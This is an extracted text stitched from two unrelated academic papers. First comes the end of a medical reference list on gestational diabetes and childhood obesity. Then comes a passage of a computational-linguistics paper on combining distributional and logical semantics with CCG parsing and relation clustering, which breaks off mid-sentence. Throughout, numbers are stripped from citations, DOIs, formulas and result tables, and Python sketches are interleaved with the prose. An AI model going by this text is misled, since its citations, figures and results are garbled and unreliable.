reports . (https://doi.org/ . /s - - -x) bellamy l, casas jp, hingorani ad & williams d. type diabetes mellitus after gestational diabetes: a systematic review and meta-analysis. lancet – . (https://doi.org/ . / s - ( ) - ) silverman bl, rizzo t, green oc, cho nh, winter rj, ogata es, richards ge & metzger be. long-term prospective evaluation of offspring of diabetic mothers. diabetes (supplement ) – . (https://doi.org/ . /diab. . .s ) silverman bl, rizzo ta, cho nh & metzger be. long-term effects of the intrauterine environment. the northwestern university diabetes in pregnancy center. diabetes care (supplement ) b –b . pettitt dj, baird hr, aleck ka, bennett ph & knowler wc. excessive obesity in offspring of pima indian women with diabetes during pregnancy. new england journal of medicine – . (https://doi.org/ . /nejm ) pettitt dj, nelson rg, saad mf, bennett ph & knowler wc. diabetes and obesity in the offspring of pima indian women with diabetes during pregnancy. diabetes care – . (https://doi. org/ . /diacare. . . ) dabelea d. the predisposition to obesity and diabetes in offspring of diabetic mothers. diabetes care (supplement ) s –s . (https://doi.org/ . /dc -s ) tam wh, ma rcw, ozaki r, li am, chan mhm, yuen ly, lao tth, yang x, ho cs, tutino ge, et al. in utero exposure to maternal hyperglycemia increases childhood cardiometabolic risk in offspring. diabetes care – . (https://doi. org/ . /dc - ) hillier ta, pedula kl, vesco kk, oshiro ce & ogasawara kk. impact of maternal glucose and gestational weight gain on child obesity over the first decade of life in normal birth weight infants. maternal and child health journal – . (https://doi.org/ . / s - - - ) whitaker rc, pepe ms, seidel kd, wright ja & knopp rh. 
gestational diabetes and the risk of offspring obesity. pediatrics e . (https://doi.org/ . /peds. . .e ) gillman mw, rifas-shiman s, berkey cs, field ae & colditz ga. maternal gestational diabetes, birth weight, and adolescent obesity. pediatrics e –e . (https://doi.org/ . / peds. . .e ) tam wh, ma rc, yang x, ko gt, tong pc, cockram cs, sahota ds, rogers ms & chan jc. glucose intolerance and cardiometabolic risk in children exposed to maternal gestational diabetes mellitus in utero. pediatrics – . (https://doi.org/ . / peds. - ) who consultation. definition, diagnosis and classification of diabetes mellitus and its complications. part : diagnosis and classification of diabetes mellitus. geneva, switzerland: world health organization, . li w, liu h, qiao y, lv f, zhang s, wang l, leng j, qi l, tuomilehto j & hu g. metabolic syndrome of weight change from pre-pregnancy to – years post-partum among chinese women with prior gestational diabetes. diabetic medicine – . (https://doi.org/ . /dme. ) hu g, tian h, zhang f, liu h, zhang c, zhang s, wang l, liu g, yu z, yang x, et al. tianjin gestational diabetes mellitus prevention program: study design, methods, and -year interim report on the feasibility of lifestyle intervention program. diabetes research and clinical practice – . (https://doi.org/ . /j. diabres. . . ) li yp, he yn, zhai fy, yang xg, hu xq, zhao wh & ma gs. [comparison of assessment of food intakes by using dietary survey methods]. zhonghua yu fang yi xue za zhi – . zhou b. [predictive values of body mass index and waist circumference to risk factors of related diseases in chinese adult population]. zhonghua liu xing bing xue za zhi – . world health organization. the who child growth standards. geneva, switzerland: world health organization, . this work is licensed under a creative commons attribution-noncommercial . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd https://doi.org/ . /s - - -x https://doi.org/ . /s - ( ) - https://doi.org/ . /s - ( ) - https://doi.org/ . /diab. . .s https://doi.org/ . /nejm https://doi.org/ . /diacare. . . https://doi.org/ . /diacare. . . https://doi.org/ . /dc -s https://doi.org/ . /dc - https://doi.org/ . /dc - https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /peds. . .e https://doi.org/ . /peds. . .e https://doi.org/ . /peds. . .e https://doi.org/ . /peds. - https://doi.org/ . /peds. - https://doi.org/ . /dme. https://doi.org/ . /j.diabres. . . https://doi.org/ . /j.diabres. . . https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com j wang et al. gdm and offspring’s obesity : ogden cl, carroll md, kit bk & flegal km. prevalence of obesity and trends in body mass index among us children and adolescents, – . jama – . (https://doi.org/ . / jama. . ) fernandez jr, redden dt, pietrobelli a & allison db. waist circumference percentiles in nationally representative samples of african-american, european-american, and mexican-american children and adolescents. journal of pediatrics – . (https://doi.org/ . /j.jpeds. . . ) laurson kr, eisenmann jc & welk gj. body fat percentile curves for u.s. children and adolescents. american journal of preventive medicine s –s . (https://doi.org/ . /j.amepre. . . ) reece ea. the fetal and maternal consequences of gestational diabetes mellitus. 
journal of maternal-fetal and neonatal medicine – . (https://doi.org/ . / ) thaware pk, mckenna s, patterson cc, hadden dr, pettitt dj & mccance dr. untreated mild hyperglycemia during pregnancy and anthropometric measures of obesity in offspring at age – years. diabetes care – . (https://doi.org/ . / dc - ) pettitt dj, mckenna s, mclaughlin c, patterson cc, hadden dr & mccance dr. maternal glucose at weeks of gestation is not associated with obesity in -year-old offspring: the belfast hyperglycemia and adverse pregnancy outcome (hapo) family study. diabetes care – . (https://doi.org/ . / dc - ) lawlor da. the society for social medicine john pemberton lecture . developmental overnutrition-an old hypothesis with new importance? international journal of epidemiology – . (https://doi.org/ . /ije/dys ) sullivan el & grove kl. metabolic imprinting in obesity. forum of nutrition – . waterland ra & garza c. potential mechanisms of metabolic imprinting that lead to chronic disease. american journal of clinical nutrition – . (https://doi.org/ . /ajcn/ . . ) fraser a & lawlor da. long-term health outcomes in offspring born to women with diabetes in pregnancy. current diabetes reports . (https://doi.org/ . /s - - -x) oh w, gelardi nl & cha cj. maternal hyperglycemia in pregnant rats: its effect on growth and carbohydrate metabolism in the offspring. metabolism – . (https://doi. org/ . / - ( ) - ) yamashita h, shao j, qiao l, pagliassotti m & friedman je. effect of spontaneous gestational diabetes on fetal and postnatal hepatic insulin resistance in lepr(db/+) mice. pediatric research – . (https://doi.org/ . / .pdr. . . d) dietz p, bombard j, mulready-ward c, gauthier j, sackoff j, brozicevic p, gambatese m, nyland-funke m, england l, harrison l, et al. validation of self-reported maternal and infant health indicators in the pregnancy risk assessment monitoring system. maternal and child health journal – . (https://doi. org/ . /s - - -y) received in final form november accepted november accepted preprint published online december this work is licensed under a creative commons attribution-noncommercial . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd https://doi.org/ . /jama. . https://doi.org/ . /jama. . https://doi.org/ . /j.jpeds. . . https://doi.org/ . /j.amepre. . . https://doi.org/ . / https://doi.org/ . /dc - https://doi.org/ . /dc - https://doi.org/ . /dc - https://doi.org/ . /dc - https://doi.org/ . /ije/dys https://doi.org/ . /ajcn/ . . https://doi.org/ . /s - - -x https://doi.org/ . / - ( ) - https://doi.org/ . / - ( ) - https://doi.org/ . / .pdr. . . d https://doi.org/ . /s - - -y https://doi.org/ . /s - - -y https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com abstract introduction methods gdm screening process study population calculation of bmi children’s z scores and overweight/obesity statistical analyses results discussion declaration of interest funding author contribution statement acknowledgements references edinburgh research explorer combined distributional and logical semantics citation for published version: lewis, m & steedman, m , 'combined distributional and logical semantics', transactions of the association for computational linguistics, vol. , pp. - . 
transactions of the association for computational linguistics ( ), – . action editor: johan bos. © association for computational linguistics.

combined distributional and logical semantics

mike lewis, school of informatics, university of edinburgh, edinburgh, eh ab, uk, mike.lewis@ed.ac.uk
mark steedman, school of informatics, university of edinburgh, edinburgh, eh ab, uk, steedman@inf.ed.ac.uk

abstract

we introduce a new approach to semantics which combines the benefits of distributional and formal logical semantics. distributional models have been successful in modelling the meanings of content words, but logical semantics is necessary to adequately represent many function words. we follow formal semantics in mapping language to logical representations, but differ in that the relational constants used are induced by offline distributional clustering at the level of predicate-argument structure. our clustering algorithm is highly scalable, allowing us to run on corpora the size of gigaword. different senses of a word are disambiguated based on their induced types. we outperform a variety of existing approaches on a wide-coverage question answering task, and demonstrate the ability to make complex multi-sentence inferences involving quantifiers on the fracas suite.

introduction

mapping natural language to meaning representations is a central challenge of nlp. there has been much recent progress in unsupervised distributional semantics, in which the meaning of a word is induced based on its usage in large corpora. this approach is useful for a range of key applications including question answering and relation extraction (lin and pantel, ; poon and domingos, ; yao et al., ). because such a semantics can be automatically induced, it escapes the limitation of depending on relations from hand-built training data, knowledge bases or ontologies, which have proved of limited use in capturing the huge variety of meanings that can be expressed in language. however, distributional semantics has largely developed in isolation from the formal semantics literature. whilst distributional semantics has been effective in modelling the meanings of content words such as nouns and verbs, it is less clear that it can be applied to the meanings of function words.
semantic operators, such as determiners, negation, conjunc- tions, modals, tense, mood, aspect, and plurals are ubiquitous in natural language, and are crucial for high performance on many practical applications— but current distributional models struggle to capture even simple examples. conversely, computational models of formal semantics have shown low recall on practical applications, stemming from their re- liance on ontologies such as wordnet (miller, ) to model the meanings of content words (bobrow et al., ; bos and markert, ). for example, consider what is needed to answer a question like did google buy youtube? from the following sentences: . google purchased youtube . google’s acquisition of youtube . google acquired every company . youtube may be sold to google . google will buy youtube or microsoft . google didn’t takeover youtube all of these require knowledge of lexical seman- tics (e.g. that buy and purchase are synonyms), but some also need interpretation of quantifiers, nega- tives, modals and disjunction. it seems unlikely that distributional or formal approaches can accomplish the task alone. we propose a method for mapping natural lan- guage to first-order logic representations capable of capturing the meanings of function words such as every, not and or, but which also uses distributional statistics to model the meaning of content words. our approach differs from standard formal seman- tics in that the non-logical symbols used in the log- ical form are cluster identifiers. where standard se- mantic formalisms would map the verb write to a write’ symbol, we map it to a cluster identifier such as relation , which the noun author may also map to. this mapping is learnt by offline clustering. unlike previous distributional approaches, we perform clustering at the level of predicate-argument structure, rather than syntactic dependency struc- ture. this means that we abstract away from many syntactic differences that are not present in the se- mantics, such as conjunctions, passives, relative clauses, and long-range dependencies. this signifi- cantly reduces sparsity, so we have fewer predicates to cluster and more observations for each. of course, many practical inferences rely heavily on background knowledge about the world—such knowledge falls outside the scope of this work. background our approach is based on combinatory categorial grammar (ccg; steedman, ), a strongly lexi- calised theory of language in which lexical entries for words contain all language-specific information. the lexical entry for each word contains a syntactic category, which determines which other categories the word may combine with, and a semantic inter- pretation, which defines the compositional seman- tics. for example, the lexicon may contain the entry: write ` (s\np)/np : λ yλ x.write′(x,y) crucially, there is a transparent interface between the syntactic category and the semantics. for ex- ample the transitive verb entry above defines the verb syntactically as a function mapping two noun- phrases to a sentence, and semantically as a bi- nary relation between its two argument entities. this means that it is relatively straightforward to deterministically map parser output to a logical form, as in the boxer system (bos, ). this every dog barks np↑/n n s\np λ pλ q.∀x[p(x) =⇒ q(x)] λ x.dog′(x) λ x.bark′(x) > np↑ λ q.∀x[dog′(x) =⇒ q(x)] > s ∀x[dog′(x) =⇒ bark′(x)] figure : a standard logical form derivation using ccg. 
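the derivation in the figure can be mirrored almost literally in executable form: each lexical entry pairs a syntactic category with a lambda term, and forward application is ordinary function application (β-reduction). the sketch below is a toy illustration, not the paper's system; the tiny "model" of dogs and barkers is assumed purely so that the terms can be evaluated.

```python
# Toy model, assumed only so the lambda terms below can be evaluated.
dogs = {"rex", "fido"}
barkers = {"rex", "fido", "rover"}
entities = dogs | barkers | {"tom"}

lexicon = {
    # every := NP^/N : lam P. lam Q. forall x [P(x) -> Q(x)]
    "every": lambda p: (lambda q: all((not p(x)) or q(x) for x in entities)),
    # dog := N : lam x. dog'(x)
    "dog": lambda x: x in dogs,
    # barks := S\NP : lam x. bark'(x)
    "barks": lambda x: x in barkers,
}

# Forward application: every + dog gives the type-raised subject S/(S\NP).
subject = lexicon["every"](lexicon["dog"])
# Applying the subject to the verb phrase yields the sentence denotation.
print(subject(lexicon["barks"]))   # True: every dog barks in this toy model
```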
the np↑ notation means that the subject is type-raised, and taking the verb-phrase as an argument—so is an ab- breviation of s/(s\np). this is necessary in part to sup- port a correct semantics for quantifiers. input sentence shakespeare wrote macbeth ⇓ intial semantic analysis writearg ,arg (shakespeare, macbeth) ⇓ entity typing writearg :per,arg :book (shakespeare:per, macbeth:book) ⇓ distributional semantic analysis relation (shakespeare:per, macbeth:book) figure : layers used in our model. form of semantics captures the underlying predicate- argument structure, but fails to license many impor- tant inferences—as, for example, write and author do not map to the same predicate. in addition to the lexicon, there is a small set of binary combinators and unary rules, which have a syntactic and semantic interpretation. figure gives an example ccg derivation. overview of approach we attempt to learn a ccg lexicon which maps equivalent words onto the same logical form—for example learning entries such as: author ` n/pp[o f ] : λ xλ y.relation (x,y) write ` (s\np)/np : λ xλ y.relation (x,y) the only change to the standard ccg derivation is that the symbols used in the logical form are arbi- trary relation identifiers. we learn these by first map- ping to a deterministic logical form (using predicates such as author’ and write’), using a process simi- lar to boxer, and then clustering predicates based on their arguments. this lexicon can then be used to parse new sentences, and integrates seamlessly with ccg theories of formal semantics. typing predicates—for example, determining that writing is a relation between people and books— has become standard in relation clustering (schoen- mackers et al., ; berant et al., ; yao et al., ). we demonstate how to build a typing model into the ccg derivation, by subcategorizing all terms representing entities in the logical form with a more detailed type. these types are also in- duced from text, as explained in section , but for convenience we describe them with human-readable labels, such as per, loc and book. a key advantage of typing is that it allows us to model ambiguous predicates. following berant et al. ( ), we assume that different type signatures of the same predicate have different meanings, but given a type signature a predicate is unambiguous. for example a different lexical entry for the verb born is used in the contexts obama was born in hawaii and obama was born in , reflecting a distinction in the semantics that is not obvious in the syntax . typing also greatly improves the efficiency of clustering, as we only need to compare predicates with the same type during clustering (for example, we do not have to consider clustering a predicate between people and places with predicates between people and dates). in this work, we focus on inducing binary rela- tions. many existing approaches have shown how to produce good clusterings of (non-event) nouns (brown et al., ), any of which could be sim- ply integrated into our semantics—but relation clus- tering remains an open problem (see section ). n-ary relations are binarized, by creating a bi- nary relation between each pair of arguments. for example, for the sentence russia sold alaska to the united states, the system creates three binary relations— corresponding to selltosomeone(russia, alaska), buyfromsomeone(us, alaska), sellsome- thingto(russia, us). 
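the binarization step just described can be sketched in a few lines: every pair of arguments of an n-ary predicate-argument structure yields one binary relation. the relation-naming scheme below (lemma plus the two argument keys) is an assumption made for the example, not the paper's exact convention.

```python
from itertools import combinations

def binarize(lemma, args):
    # args maps argument keys (e.g. "arg0", "arg1", "argTo") to entities;
    # one binary relation is produced for each unordered pair of arguments.
    return [(f"{lemma}.{k1}.{k2}", e1, e2)
            for (k1, e1), (k2, e2) in combinations(sorted(args.items()), 2)]

# "russia sold alaska to the united states"
print(binarize("sell", {"arg0": "russia", "arg1": "alaska", "argTo": "united_states"}))
# [('sell.arg0.arg1', 'russia', 'alaska'),
#  ('sell.arg0.argTo', 'russia', 'united_states'),
#  ('sell.arg1.argTo', 'alaska', 'united_states')]
```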
this transformation does not whilst this assumption is very useful, it does not always hold— for example, the genitive in shakespeare’s book is ambigu- ous between ownership and authorship relations even given the types of the arguments. exactly preserve meaning, but still captures the most important relations. note that this allows us to compare semantic relations across different syntac- tic types—for example, both transitive verbs and argument-taking nouns can be seen as expressing bi- nary semantic relations between entities. figure shows the layers used in our model. initial semantic analysis the initial semantic analysis maps parser output onto a logical form, in a similar way to boxer. the semantic formalism is based on steedman ( ). the first step is syntactic parsing. we use the c&c parser (clark and curran, ), trained on ccgbank (hockenmaier and steedman, ), us- ing the refined version of honnibal et al. ( ) which brings the syntax closer to the predicate- argument structure. an automatic post-processing step makes a number of minor changes to the parser output, which converts the grammar into one more suitable for our semantics. pp (prepositional phrase) and pr (phrasal verb complement) categories are sub-categorised with the relevant preposition. noun compounds with the same muc named-entity type (chinchor and robinson, ) are merged into a single non-compositional node (we otherwise ig- nore named-entity types). all argument nps and pps are type-raised, allowing us to represent quanti- fiers. all prepositional phrases are treated as core ar- guments (i.e. given the category pp, not adjunct cat- egories like (n\n)/np or ((s\np)\(s\np))/np), as it is difficult for the parser to distinguish argu- ments and adjuncts. initial semantic lexical entries for almost all words can be generated automatically from the syntactic category and pos tag (obtained from the parser), as the syntactic category captures the underlying predicate-argument structure. we use a davidsonian-style representation of arguments (davidson, ), which we binarize by creating a separate predicate for each pair of arguments of a word. these predicates are labelled with the lemma of the head word and a propbank-style argument key (kingsbury and palmer, ), e.g. arg , argin. we distinguish noun and verb predicates based on pos for example, this allows us to give barack obama the seman- tics λ x.barack obama(x) instead of λ x.barack(x)∧obama(x), which is more convenient for collecting distributional statistics. word category semantics automatic author n/pp[o f ] λ xλ y.authorarg ,argof (y,x) write (s\np)/np λ xλ y.writearg ,arg (y,x) manual every np↑/n λ pλ q.∀x[p(x)→ q(x)] not (s\np)/(s\np) λ pλ x.¬p(x) figure : example initial lexical entries tag—so, for example, we have different predicates for effect as a noun or verb. this algorithm can be overridden with man- ual lexical entries for specific closed-class function words. whilst it may be possible to learn these from data, our approach is pragmatic as there are relatively few such words, and the complex logical forms required would be difficult to induce from dis- tributional statistics. we add a small number of lexi- cal entries for words such as negatives (no, not etc.), and quantifiers (numbers, each, every, all, etc.). some example initial lexical entries are shown in figure . entity typing model our entity-typing model assigns types to nouns, which is useful for disambiguating polysemous predicates. 
our approach is similar to o’seaghdha ( ) in that we aim to cluster entities based on the noun and unary predicates applied to them (it is simple to convert from the binary predicates to unary predicates). for example, we want the pair (bornargin, ) to map to a dat type, and (bornargin, hawaii) to map to a loc type. this is non-trivial, as both the predicates and arguments can be ambiguous between multiple types—but topic models offer a good solution (described below). . topic model we assume that the type of each argument of a pred- icate depends only on the predicate and argument, although ritter et al. ( ) demonstrate an advan- tage of modelling the joint probability of the types of multiple arguments of the same predicate. we use the standard latent dirichlet allocation model (blei et al., ), which performs comparably to more complex models proposed in o’seaghdha ( ). in topic-modelling terminology, we construct a document for each unary predicate (e.g. bornargin), based on all of its argument entities (words). we as- sume that these arguments are drawn from a small number of types (topics), such as per, dat or loc . each type j has a multinomial distribution φ j over arguments (for example, a loc type is more likely to generate hawaii than ). each unary predicate i has a multinomial distribution θi over topics, so the bornargin predicate will normally gen- erate a dat or loc type. sparse dirichlet priors α and β on the multinomials bias the distributions to be peaky. the parameters are estimated by gibbs sampling, using the mallet implementation (mccal- lum, ). the generative story to create the data is: for every type k: draw the p(arg|k) distribution φk from dir(β ) for every unary predicate i: draw the p(type|i) distribution θi from dir(α) for every argument j: draw a type zi j from mult(θi) draw an argument wi j from mult(φθi) . typing in logical form in the logical form, all constants and variables repre- senting entities x can be assigned a distribution over types px(t) using the type model. an initial type distribution is applied in the lexicon, using the φ distributions for the types of nouns, and the θi dis- tributions for the type of arguments of binary predi- cates (inverted using bayes’ rule). then at each β - reduction in the derivation, we update probabilities of the types to be the product of the type distribu- tions of the terms being reduced. if two terms x and types are induced from the text, but we give human-readable labels here for convenience. file a suit (s\np)/np np↑ λ y : { doc = . legal = . clothes = . ... } λ x : { per = . org = . ... } . f ilearg ,arg (x,y) λ p.∃y : { clothes = . legal = . doc = . ... } [suit′(y)∧ p(y)] < s\np λ x : { per = . org = . ... } ∃y : { legal = . clothes = . doc = . ... } )[suit′(y)∧ f ilearg ,arg (x,y)] figure : using the type model for disambiguation in the derivation of file a suit. type distributions are shown after the variable declarations. both suit and the object of file are lexically ambiguous between different types, but after the β -reduction only one interpretation is likely. if the verb were wear, a different interpretation would be preferred. y combine to a term z: pz(t) = px(t)py(t) ∑ t′ px(t′)py(t′) for example, in wore a suit and file a suit, the vari- able representing suit may be lexically ambiguous between clothes and legal types, but the vari- ables representing the objects of wear and f ile will have preferences that allow us to choose the correct type when the terms combine. 
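the combination rule above can be made concrete with a small sketch: at each β-reduction the type distribution of the combined term is the renormalized elementwise product of the two input distributions. the probabilities below for suit and for the object slot of file are invented for illustration; they are not values from the trained model.

# sketch of the type-combination rule: p_z(t) is proportional to p_x(t) * p_y(t).
def combine_types(p_x, p_y):
    joint = {t: p_x.get(t, 0.0) * p_y.get(t, 0.0) for t in set(p_x) | set(p_y)}
    total = sum(joint.values())
    if total == 0.0:
        return joint                       # no shared type; leave unnormalized
    return {t: p / total for t, p in joint.items()}

suit_noun = {"clothes": 0.4, "legal": 0.3, "doc": 0.3}     # lexical ambiguity of 'suit'
file_obj  = {"legal": 0.7, "doc": 0.25, "clothes": 0.05}   # object preference of 'file'
print(combine_types(suit_noun, file_obj))                  # the legal reading now dominates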
figure shows an example derivation using the type model for disam- biguation . distributional relation clustering model the typed binary predicates can be grouped into clusters, each of which represents a dis- tinct semantic relation. note that because we cluster typed predicates, bornarg :per,argin:loc and bornarg :per,argin:dat can be clustered separately. . corpus statistics typed binary predicates are clustered based on the expected number of times they hold between each argument-pair in the corpus. this means we cre- ate a single vector of argument-pair counts for each predicate (not a separate vector for each argument). for example, the vector for the typed predicate writearg :per,arg :book may contain non-zero counts for entity-pairs such as (shakespeare, macbeth), (dickens, oliver twist) and (rowling, harry potter). our implementation follows steedman ( ) in using gener- alized skolem terms rather than existential quantifiers, in order to capture quantifier scope alternations monotonically, but we omit these from the example to avoid introducing new notation. the entity-pair counts for authorarg :per,argof :book may be similar, on the assumption that both are sam- ples from the same underlying semantic relation. to find the expected number of occurrences of argument-pairs for typed binary predicates in a cor- pus, we first apply the type model to the derivation of each sentence, as described in section . . this outputs untyped binary predicates, with distributions over the types of their arguments. the type of the predicate must match the type of its arguments, so the type distribution of a binary predicate is simply the joint distribution of the two argument type dis- tributions. for example, if the arguments in a bornarg ,argin(obama,hawaii) derivation have the respective type distributions (per= . , loc= . ) and (loc= . , dat= . ), the distribution over bi- nary typed predicates is (bornarg :per,argin:loc= . , bornarg :per,argin:dat = . , etc.) the expected counts for (obama,hawaii) in the vectors for bornarg :per,argin:loc and bornarg :per,argin:dat are then incremented by these probabilities. . clustering many algorithms have been proposed for cluster- ing predicates based on their arguments (poon and domingos, ; yao et al., ). the number of relations in the corpus is unbounded, so the cluster- ing algorithm should be non-parametric. it is also important that it remains tractable for very large numbers of predicates and arguments, in order to give us a greater coverage of language than can be achieved by hand-built ontologies. we cluster the typed predicate vectors using the chinese whispers algorithm (biemann, )— although somewhat ad-hoc, it is both non-parametric and highly scalable . this has previously been used for noun-clustering by fountain and lapata ( ), who argue it is a cognitively plausible model for language acquisition. the collection of predicates and arguments is converted into a graph with one node per predicate, and edge weights representing the similarity between predicates. predicates with different types have zero-similarity, and otherwise similarity is computed as the cosine-similarity of the tf-idf vectors of argument-pairs. we prune nodes oc- curring fewer than times, edges with weights less than − , and a short list of stop predicates. the algorithm proceeds as follows: . each predicate p is assigned to a different se- mantic relation rp . iterate over the predicates p in a random order . 
set rp = arg max r ∑p′ r=rp′ sim(p, p ′), where sim(p, p′) is the distributional similarity be- tween p and p′, and r=r′ is iff r=r’ and otherwise. . repeat ( .) to convergence. semantic parsing using relation clusters the final phase is to use our relation clusters in the lexical entries of the ccg semantic derivation. this is slightly complicated by the fact that our predi- cates are lexically ambiguous between all the pos- sible types they could take, and hence the relations they could express. for example, the system can- not tell whether born in is expressing a birthplace or birthdate relation until later in the derivation, when it combines with its arguments. however, all the possible logical forms are identical except for the symbols used, which means we can produce a packed logical form capturing the full distribution over logical forms. to do this, we make the predi- cate a function from argument types to relations. for each word, we first take the lexical semantic definition produced by the algorithm in section . for binary predicates in this definition (which will we also experimented with a dirichlet process mixture model (neal, ), but even with the efficient a* search algorithms introduced by daumé iii ( ), the cost of inference was found to be prohibitively high when run at large scale. be untyped), we perform a deterministic lookup in the cluster model learned in section , using all pos- sible corresponding typed predicates. this allows us to represent the binary predicates as packed predi- cates: functions from argument types to relations. for example, if the clustering maps bornarg :per,argin:loc to rel (“birthplace”) and bornarg :per,argin:dat to rel (“birthdate”), our lexicon contains the following packed lexical entry (type-distributions on the variables are suppressed): born ` (s\np)/pp[in] : λ yλ x. { (x : per,y : loc)⇒rel (x : per,y : dat)⇒rel } (x,y) the distributions over argument types then imply a distribution over relations. for example, if the packed-predicate for bornarg ,argin is applied to ar- guments obama and hawaii, with respective type distributions (per= . , loc= . ) and (loc= . , dat= . ) , the distribution over relations will be (rel = . , rel = . , etc.). if has a type-distribution (loc= . , dat= . ), the output packed-logical form for obama was born in hawaii in will be:    rel = . rel = . ...   (ob,hw)∧    rel = . rel = . ...   (ob, ) the probability of a given logical form can be read from this packed logical form. experiments our approach aims to offer a strong model of both formal and lexical semantics. we perform two eval- uations, aiming to target each of these separately, but using the same semantic representations in each. we train our system on gigaword (graff et al., ), which contains around billion words of newswire. the type-model is trained using types , and , iterations of gibbs sampling (us- ing the distributions from the final sample). table these distributions are composed from the type-distributions for both the predicate and argument, as explained in section this number was chosen by examination of models trained with different numbers of types. the algorithm produces se- mantically coherent clusters for much larger numbers of types, but many of these are fine-grained categories of people, which introduces sparsity in the relation clustering. 
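as a sketch of the chinese whispers clustering described in the clustering section above (and not the authors' implementation), the following shows the label-propagation loop over a predicate-similarity graph. the toy predicates and similarity values are invented; in the paper, edge weights are cosine similarities of tf-idf argument-pair vectors and predicates with different types have zero similarity.

# chinese whispers over a weighted similarity graph of typed predicates.
import random
from collections import defaultdict

def chinese_whispers(nodes, sim, iterations=20, seed=0):
    rng = random.Random(seed)
    label = {n: n for n in nodes}                 # each predicate starts as its own relation
    for _ in range(iterations):                   # repeat to convergence (fixed cap here)
        order = list(nodes)
        rng.shuffle(order)                        # visit predicates in random order
        for p in order:
            votes = defaultdict(float)
            for q in nodes:
                if q != p and sim(p, q) > 0.0:
                    votes[label[q]] += sim(p, q)  # neighbours vote for their current relation
            if votes:
                label[p] = max(votes, key=votes.get)
    return label

preds = ["write.arg0,arg1", "author.arg0,argof", "buy.arg0,arg1", "acquire.arg0,arg1"]
toy = {("write.arg0,arg1", "author.arg0,argof"): 0.8, ("buy.arg0,arg1", "acquire.arg0,arg1"): 0.7}
sim = lambda a, b: toy.get((a, b), toy.get((b, a), 0.0))
print(chinese_whispers(preds, sim))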
type top words suspect, assailant, fugitive, accomplice author, singer, actress, actor, dad city, area, country, region, town, capital subsidiary, automaker, airline, co., gm musical, thriller, sequel, special table : most probable terms in some clusters induced by the type model. shows some example types. the relation clustering uses only proper nouns, to improve precision (spar- sity problems are partly offset by the large input cor- pus). aside from parsing, the pipeline takes around a day to run using cores. . question answering experiments as yet, there is no standard way of evaluating lexical semantics. existing tasks like recognising textual entailment (rte; dagan et al., ) rely heavily on background knowledge, which is beyond the scope of this work. intrinsic evaluations of entailment rela- tions have low inter-annotator agreement (szpektor et al., ), due to the difficulty of evaluating rela- tions out of context. our evaluation is based on that performed by poon and domingos ( ). we automatically con- struct a set of questions by sampling from text, and then evaluate how many answers can be found in a different corpus. from dependency-parsed newswire, we sample either x nsub j← verbdob j→ y, xnsub j← verb pob j→ y or xnsub j← be dob j→ nounpob j→ y patterns, where x and y are proper nouns and the verb is not on a list of stop verbs, and deterministically con- vert these to questions. for example, from google bought youtube we create the questions what did google buy? and what bought youtube?. the task is to find proper-noun answers to these questions in a different corpus, which are then evaluated by hu- man annotators based on the sentence the answer was retrieved from . systems can return multiple common nouns are filtered automatically. to focus on evalu- ating the semantics, annotators ignored garbled sentences due to errors pre-processing the corpus (these are excluded from the results). we also automatically exclude weekday and month answers, which are overwhelmingly syntax errors for all systems—e.g. treating tuesday as an object in obama an- nounced tuesday that... answers to the same question (e.g. what did google buy? may have many valid answers), and all of these contribute to the result. as none of the systems model tense or temporal semantics, annotators were instructed to annotate answers as correct if they were true at any time. this approach means we evaluate on relations in proportion to corpus frequency. we sample questions from the new york times subset of gigaword from , and search for an- swers in the new york times from . we evaluate the following approaches: • ccg-baseline the logical form produced by our ccg derivation, without the clustering. • ccg-wordnet the ccg logical form, plus wordnet as a model of lexical semantics. • ccg-distributional the logical form includ- ing the type model and clusters. • relational lda an lda based model for clustering dependency paths (yao et al., ). we train on new york times subset of giga- word , using their setup of iterations with relation types. • reverb a sophisticated open information ex- traction system (fader et al., ). unsupervised semantic parsing (usp; poon and domingos, ; usp; poon and domingos, ; usp; titov and klementiev, ) would be another obvious baseline. however, memory requirements mean it is not possible to run at this scale (our system is trained on orders of magnitude more data than the usp evaluation). yao et al. ( ) found it had comparable performance to relational lda. 
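the question construction described above can be sketched as follows; this is a simplified stand-in rather than the authors' script, and passing both the past and base verb forms explicitly is an assumption made to keep the example short.

# turn a sampled (x, verb, y) pattern with proper-noun arguments into two questions.
def make_questions(x, verb_past, verb_base, y):
    return [
        "what did %s %s?" % (x, verb_base),   # asks for the object, e.g. "what did google buy?"
        "what %s %s?" % (verb_past, y),       # asks for the subject, e.g. "what bought youtube?"
    ]

print(make_questions("google", "bought", "buy", "youtube"))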
for the ccg models, rather than performing full first-order inference on a large corpus, we simply test whether the question predicate subsumes a can- didate answer predicate, and whether the arguments match . in the case of ccg-distributional, we cal- culate the probability that the two packed-predicates this is around % of gigaword, and was the largest scale possible on our resources. we do this as it is much more efficient than full first-order theorem-proving. we could in principle make additional in- ferences with theorem-proving, such as answering what did google buy? from google bought the largest video website and youtube is the largest video website. system answers correct relational-lda . % reverb . % ccg-baseline . % ccg-wordnet . % ccg-distributional@ . % ccg-distributional@ . % table : results on wide-coverage question answer- ing task. ccg-distributional ranks question/answer pairs by confidence—@ means we evaluate the top of these. it is not possible to give a recall figure, as the total number of correct answers in the corpus is unknown. are in the same cluster, marginalizing over their ar- gument types. answers are ranked by this proba- bility. for ccg-wordnet, we check if the ques- tion predicate is a hypernym of the candidate answer predicate (using any wordnet sense of either term). results are shown in table . relational-lda in- duces many meaningful clusters, but predicates must be assigned to one of relations, so results are dominated by large, noisy clusters (it is not possi- ble to take the n-best answers as the cluster assign- ments do not have a confidence score). the ccg- baseline errors are mainly caused by parser errors, or relations in the scope of non-factive operators. ccg-wordnet adds few answers to ccg-baseline, reflecting the limitations of hand-built ontologies. ccg-distributional substantially improves recall over other approaches whilst retaining good preci- sion, demonstrating that we have learnt a powerful model of lexical semantics. table shows some correctly answered questions. the system improves over the baseline by mapping expressions such as merge with and acquisition of to the same relation cluster. many of the errors are caused by conflating predicates where the entailment only holds in one direction, such as was elected to with ran for. hier- archical clustering could be used to address this. . experiments on the fracas suite we are also interested in 